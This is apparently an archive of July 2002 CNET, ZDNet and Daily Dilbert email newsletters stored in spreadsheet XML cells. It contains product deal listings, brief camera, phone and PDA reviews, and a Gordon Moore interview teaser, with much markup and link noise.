\n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Sony Cyber Shot DSC-F707**  \nÂ• 5.0-megapixels, 1.8-in LCD  \nÂ• 5x optical/10x digital zoom  \nÂ• Incl. 16MB Memory Stick  \n   **Just $999**  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n\n**buy.com** |\n\n![]([URL]http://shopper.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Minolta Dimage X**  \nÂ• Free shipping  \nÂ• 2.1-megapixels, 1.5-in LCD  \nÂ• 3xoptical zoom, 2xdigital  \nÂ• Free shipping  \n   **Just $347**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Fujifilm FinePix 2600 Zoom**  \nÂ• Free shipping  \nÂ• 2.1-megapixels, 1600x1200 res.  \nÂ• 3x optical/2.5x digital Zoom  \n   **Just $238**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Minolta Dimage F100**  \nÂ• Free shipping  \nÂ• Super-fine 4-megapixel images  \nÂ• Sleek, slim design  \n   **Just $600**  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n  \n  \n  \n  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  ![Sign up for more free newsletters from\nCNET!]([URL]http://a.r.tv.com[/URL]  \nThe e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com\n\nUnsubscribe |  Manage My Subscriptions  | FAQ |  Advertise  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n|\n\n  \n**Copyright 2002 CNET Networks, Inc. All rights reserved.**\n\n|\n\n![](http://gserv-\ncnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e443&amp;ISSUE=2002-07-11)  \n  \n---|---  \n.  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://home.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shopper.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.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www.cnet.com http://clickthru.online.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-cnet-newsletters@example.com\nFrom: CNET Cell Phone Weekly Newsletter &lt;Online#3.19818.db-jpH2lYGz6mGOssRR.1@newsletter.online.com&gt;\nDate: Thu, 11 Jul 2002 13:39:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 13:39:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Cell Phone Weekly Newsletter &lt;Online#3.19818.db-jpH2lYGz6mGOssRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Cell phones coming soon</t>
  </si>
  <si>
    <t>![CNET Wireless\nDispatch]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n  \n|  ![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nWireless All CNET The Web  \n---  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \nJuly 11, 2002  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] | Cell phones coming soon--updated  \n  \n---|---  \n![]([URL]http://home.cnet.com[/URL] | Siemens S46  \n  \n![]([URL]http://home.cnet.com[/URL] | Cell phone personality test--\nupdated  \n  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n|\n\n**Wireless Top 5s**  \n\n  * Top 5 AT&amp;T; Wireless cell phones  \n\n  * Top 5 Sprint PCS phones  \n\n  * Top 5 Verizon Wireless cell phones\n\nAll Top 5s\n\n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n![Reviews &amp; Features]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://a.r.tv.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n---|---  \n**Cell phones coming soon--updated**  \nBefore you buy, see what products are on the horizon. We have pictures and\nrelease dates for upcoming models.  \n**Read the story **  \n  \n**Siemens S46**  \nThe company's second mobile for the U.S. market picks up where the stylish S40\nleft off. Like that earlier model, this one's a world phone with business-\ncentric features. How impressive is it?  \n**Read the review**  \n![]([URL]http://home.cnet.com[/URL]  \n**Cell phone personality test--updated**  \nChoose among our five user profiles to find out what models best match your\nwireless persona. Take the test and see them all.  \n**Match your profile**  \n  \n\n![]([URL]http://home.cnet.com[/URL]\n![]([URL]http://home.cnet.com[/URL] **\n\n  * Live tech help; submit your question now\n  * CNET News.com: Top CIOs on the future of IT\n  * Find a job you love, with more than 1 million postings\n  * ZDNet: This IT director has had enough of Microsoft\n  * May Editors' Choice award: Pioneer's home-theater system, the HTS-910DV \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59&amp;ISSUE=2002-07-11)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://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home.cnet.com http://a.r.tv.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://home.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cnet-newsletters@example.com\nFrom: CNET Shopper Mac Edition &lt;Online#3.19816.79-jnsygj5uv8NiX9RR.1@newsletter.online.com&gt;\nDate: Thu, 11 Jul 2002 12:23:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 12:23:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Shopper Mac Edition &lt;Online#3.19816.79-jnsygj5uv8NiX9RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Our new Memory Configurator makes RAM shopping easy! (CNET SHOPPER)</t>
  </si>
  <si>
    <t>\n\n![CNET Shopper Mac Edition]([URL]http://www.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n|  \n---  \n  \n![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nShopper All CNET The Web  \n---  \n  \n![Most Popular]([URL]http://home.cnet.com[/URL]  \n1 | Cyber Shot DSC-F707  \n  \n---|---  \n2 | Canon PowerShot S40  \n  \n3 | Palm m515  \n  \n4 | Nikon Coolpix 995  \n  \n5 | Canon PowerShot G2  \n  \n![ ]([URL]http://www.cnet.com[/URL]  **All most popular**  \n---  \n  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft  **  \n---  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  |  |  | ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Dear Reader,**\n\nIs your Mac acting a bit sluggish? Does is sometimes choke on large graphics\nfiles or spend more time than ever spinning its hard drive?\n\nAdding more RAM to your Mac is an easy way to get the most out of your\nfavorite game and graphics applications. But unfortunately, figuring out what\ntype to buy is often both difficult and frustrating.\n\nCNET's all-in-one **Memory Configurator** makes finding the perfect memory\neasy! Whether you're searching for iBook, iMac, or PowerBook memory, your just\na few clicks away from the upgrade you'll need to get your system living up to\nits full potential.\n\nCheck out CNET's new **Memory Configurator**  \n  \n\n![Featured]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://shopper.cnet.com[/URL] |  **Apple iMac**  \nÂ• PowerPC G4, 800MHz  \nÂ• DVD-CDRW  \nÂ• 256MB RAM, 60GB hard drive  \n   **Just $1,805**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Apple Power\nMac G4**  \nÂ• PowerPC G4 867MHz  \nÂ• 128MB SDRAM  \nÂ• 60GB hard drive  \n   **Just $1,775**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Formac Gallery\n1740 (DVI)**  \nÂ• 17.4-inch TFT active matrix  \nÂ• ADC-to-DVI/USB/Power converter box  \nÂ• 1,280x1,024 resolution  \n   **Just $949 **  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Harman Kardon\nSoundSticks**  \nÂ• Superior sound quality  \nÂ• 65 total watts maximum  \nÂ• 6-inch woofer, USB  \n   **Just $157**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Palm m515**  \nÂ• Free shipping available  \nÂ• 16MB, Palm OS v4.1  \nÂ• MultiMediaCard slot  \n   **Just $312**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Canon\nPowerShot G2**  \nÂ• 4.0-megapixel  \nÂ• 3x optical/3.6x digital zoom  \nÂ• 32MB CompactFlash card  \n   **Just $649**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n\n![Special Feature]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \nDid you know that ChannelOnline enables you to streamline your sales process\nby building quotes and orders online?\n\nSimply select a customer you've previously entered into ChannelOnline's\ndatabase and their company information, and a customized price profile is\nautomatically applied to their quote. You can add products as you search the\nproduct database and work on multiple quotes at once as you respond to\ndifferent customer requests throughout the day.\n\n**Sign up now** to streamline your entire buying and selling chain.\n\n**Tell me more about ChannelOnline.**\n\n![On the CNET Network]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**\n\n  * Tech Trends\n  * Hardware\n  * Software\n  * Shopping\n  * Downloads \n** |  **\n\n  * News\n  * Investing\n  * Electronics\n  * Web Building\n  * Help &amp; How-Tos \n** |  **\n\n  * Internet\n  * Games\n  * Message Boards\n  * CNET TV &amp; Radio\n  * Music Center\n\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41&amp;ISSUE=2002-07-11)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://a.r.tv.com http://cnet.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.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shopper.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.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cnet-newsletters@example.com\nFrom: CNET Cool Gear &lt;Online#3.19810.0b-J216gBVtducSVdRR.1@newsletter.online.com&gt;\nDate: Thu, 11 Jul 2002 11:59:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 11:59:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Cool Gear &lt;Online#3.19810.0b-J216gBVtducSVdRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET Cool Gear:  Leica's legendary charm</t>
  </si>
  <si>
    <t>![CNET Cool Gear Newsletter]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://a.r.tv.com[/URL]  \n|  ![]([URL]http://www.cnet.com[/URL]  \n  \n---  \n  \n![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nElectronics All CNET The Web  \n---  \n  \n![Editors' Choice]([URL]http://a.r.tv.com[/URL]  \nToshiba Pocket PC e310 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Handhelds  \n---  \nOnkyo TX-DS797 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Electronics  \nCanon PowerShot G2 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Cameras  \nPioneer HTS-910DV ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Electronics  \nCreative Labs Nomad Jukebox 3 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Portable Electronics  \nMicrosoft Xbox ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Electronics  \nPanasonic DVD-RP91 DVD player ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Electronics  \n  \n![]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] July 11, 2002  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://a.r.tv.com[/URL]  \n\--Colin Duwe  \nAssociate Editor  \nCNET Electronics  \n|  |  **Dear readers,**  \nIf the majority of your photos are posed snapshots and landscapes, a fast\ncamera may not matter. But if you've ever missed a shot because your camera\nwas busy processing the previous photo, the Leica Digilux 1 will appeal to\nyou. We liked it too, and we gave it an Editors' Choice award.**  \n  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n![Reviews and Features]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://a.r.tv.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n---|---  \n**Leica Digilux 1: Legendary charm**  ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nThe legendary German lens maker takes aim at digital-era street photographers\nwith the Digilux 1. A combination of speed, manual control, and advanced\nfeatures helps this 4-megapixel camera provide a digital option to shutterbugs\nwith an eye for the decisive moment.  \n**Read the review  |  Check prices**  \n  \n**Onkyo LS-V950: The complete package**  \nThis home-theater kit boasts a long list of enviable features, including\nprogressive-scan video output and as many inputs and outputs as most budget\nA/V receivers. And it sounds nice, too.  \n**Read the review |  Check prices**  \n  \n**Panasonic DMC-F7: The littlest Lumix**  \nThe baby of Panasonic's new Lumix digital camera line, this ultracompact\n2-megapixel model offers Leica optics, a svelte design, and a solid, basic\nfeature set. But how does it fare when it comes to performance and image\nquality? We slipped it in our shirt pocket and went out for a shoot to find\nout.  \n**Read the review  |  Check prices**  \n  \n**Toshiba Pocket PC e740: 400MHz in your hand**  \nPowered by Intel's new 400MHz XScale processor and boasting integrated Wi-Fi\nconnectivity, Toshiba's new PDA is an impressive mobile machine. We got hands\non with it to test the new chips and its myriad features. See how it did.  \n**Read the review  |  Check prices **  \n  \n**Samsung DVD-P721M: Sticking out in a crowd**  \nSamsung's affordable DVD-P721M not only offers progressive-scan playback but\nalso has a built-in Memory Stick slot. Is this the ideal DVD deck for owners\nof Sony digital cameras, camcorders, and MP3 players? Read the review to find\nout more.  \n**Read the full column  |  Check prices **  \n  \n**Unitech 2U4U DMR-300: A sweet MP3 player**  ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nThis new flash-based MP3 player blew us away right out of the box, with its\nslick styling, 128MB of expandable memory, in-line remote control, and low\nprice. The fact that it can encode WMA files in real time from any line-level\naudio source is the icing on an already very tasty cake.  \n**Read the review  |  Check prices **  \n  \n**Siemens S46: A business-focused phone**  \nThe company's second mobile for the U.S. market picks up where the stylish S40\nleft off. Like that earlier model, this one is a world phone with business-\ncentric features. How impressive is it?  \n**Read the full column  |  Check prices **  \n  \n**Archos Jukebox Recorder 20: Old look, new connectivity**  ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nA must-have feature for any large-capacity MP3 player/recorder is a high-speed\nconnection that allows for quick transfer of hundreds--or even thousands--of\nfiles. Archos's next-generation product, the 20GB Recorder 20, has a USB 2.0\nconnection, but how does it stack up against the competition otherwise? Read\nthe review.  \n**Read the review  |  Check prices **  \n  \n**Philips DVD953AT: Budget progressive-scan model**  \nThis moderately priced deck faces stiff competition from Toshiba, Panasonic,\nand Zenith budget models. How does it fare? Read the review to find out.  \n**Read the review  |  Check prices **  \n  \n  \n![Up next week]([URL]http://a.r.tv.com[/URL]  \n| **The last Palm OS 4 PDA**  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \nCheck back later this week for our review of the Sony CLIE PEG-T665C. This\nPalm OS 4.1 PDA has a built-in audio player so that you can listen to MP3s on\nthe go as well as a 66MHz processor for better video playback. But with OS 5\nexpected before Christmas, is now the time to buy a high-end Palm?  \n  \n\n![]([URL]http://home.cnet.com[/URL]\n![]([URL]http://home.cnet.com[/URL] **\n\n  * Live tech help. Submit your question now.\n  * CNET News.com: Top CIOs on the future of IT.\n  * Find a job you love. More than 1 million postings\n  * ZDNet: This IT director has had enough of Microsoft\n  * May Editors' Choice award: Pioneer's Home Theater System HTS-910DV\n\n**  \n---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12&amp;ISSUE=2002-07-11)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://www.cnet.com http://a.r.tv.com http://cnet.com http://a.r.tv.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.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dilbert@example.com\nFrom: Daily Dilbert &lt;2.20367.04-Dn9ZguCXF_6U.1@ummail4.unitedmedia.com&gt;\nDate: Thu, 11 Jul 2002 06:43:20 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 06:43:20 -0400 (EDT)</t>
  </si>
  <si>
    <t>Daily Dilbert &lt;2.20367.04-Dn9ZguCXF_6U.1@ummail4.unitedmedia.com&gt;</t>
  </si>
  <si>
    <t>Your Daily Dilbert 07/11/2002</t>
  </si>
  <si>
    <t>--8227487.1026384200908.JavaMail.root.umsan1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit E-mail error You're subscribed to the HTML version of the Daily Dilbert, which shows the comic strip as a graphic, but your mail system either can't support HTML or is set up to remove HTML content. For more information, contact your Internet service provider or mail system administrator. To change to a plain text subscription, modify your account preferences at  [URL]http://www.dilbert.com[/URL] The plain text option appears toward the bottom of the modification page. --8227487.1026384200908.JavaMail.root.umsan1 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Daily Dilbert =09=09 =09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=0907/11/2002 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09&lt;= IMG SRC=3D"[URL]http://www.comics.com[/URL]" WIDTH= =3D"4" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt; =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09Hi Justin, enjoy your daily comic from Dilbert.com.If you like the Daily Dil= bert, tell a friend! Click here to send mail= =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09= Complete your collection while pretending to work! &gt; Shop =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09They're character-shaped, in colle= ctible tins.&gt; Shop&lt;= /TD&gt; =09=09=09=09=09 =09=09=09=09=09Get any Dilbert strip publ= ished in the last 90 days printed on aT-shirt, sweatshirt or poster. Se= lected older strips are also available. &gt; Shop =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09View all pro= ducts =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 Modify Your Account/UnsubscribeB= uy This StripÂ Â Â Send This=  Strip to a FriendÂ Â Â Month of Dilbert&amp;nb= sp;Â  =09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09Unsubscribe | = Modify Your Subscription | Request a New=  Subscription | Report S= ubscription Problems Subscribe to the Dilbert Newsletter/Join Dog= bert's New Ruling Class | Dilbert on Your Site/Intranet | Advertising Info | Dilbert in Your Publication =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09 =09=09 =09=09 =09=09=09 =09=09 =09=09=09 =09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09 =09 --8227487.1026384200908.JavaMail.root.umsan1--</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: ZDNet Tech Update Today &lt;Online#3.19801.5a-SW-tgr_JMGPQK9RR.1@newsletter.online.com&gt;\nDate: Thu, 11 Jul 2002 04:05:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 04:05:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>ZDNet Tech Update Today &lt;Online#3.19801.5a-SW-tgr_JMGPQK9RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Moore: Speech recognition next hurdle (Tech Update)</t>
  </si>
  <si>
    <t>\n\n![Tech Update Today]([URL]http://www.zdnet.com[/URL]\n|  ![Advertisement]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |  | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n\n![Tech Update Today]([URL]http://www.zdnet.com[/URL]  \n\n![]([URL]http://www.zdnet.com[/URL]  \n\nVITAL SIGNS FOR JULY 11, 2002  \n\n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n---  \n**David Berlind**  \n**Moore: Speech recognition next hurdle**  \nSpeech recognition will be the next transforming technology, but that\ntransformation may take another 50 years, says Intel co-founder Gordon Moore.\nHonored this week with the Presidential Medal of Freedom, Moore took time to\ntalk about the slowing down of his well-known law, the economy, philanthropic\npriorities, and more.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full\ninterview**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n**Latest from ZDNet News**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Liberty Alliance set to\nbattle Passport  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Licensing plan could\nboost Microsoft  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] IBM looks to corner low-\nend storage  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Bluetooth: Off 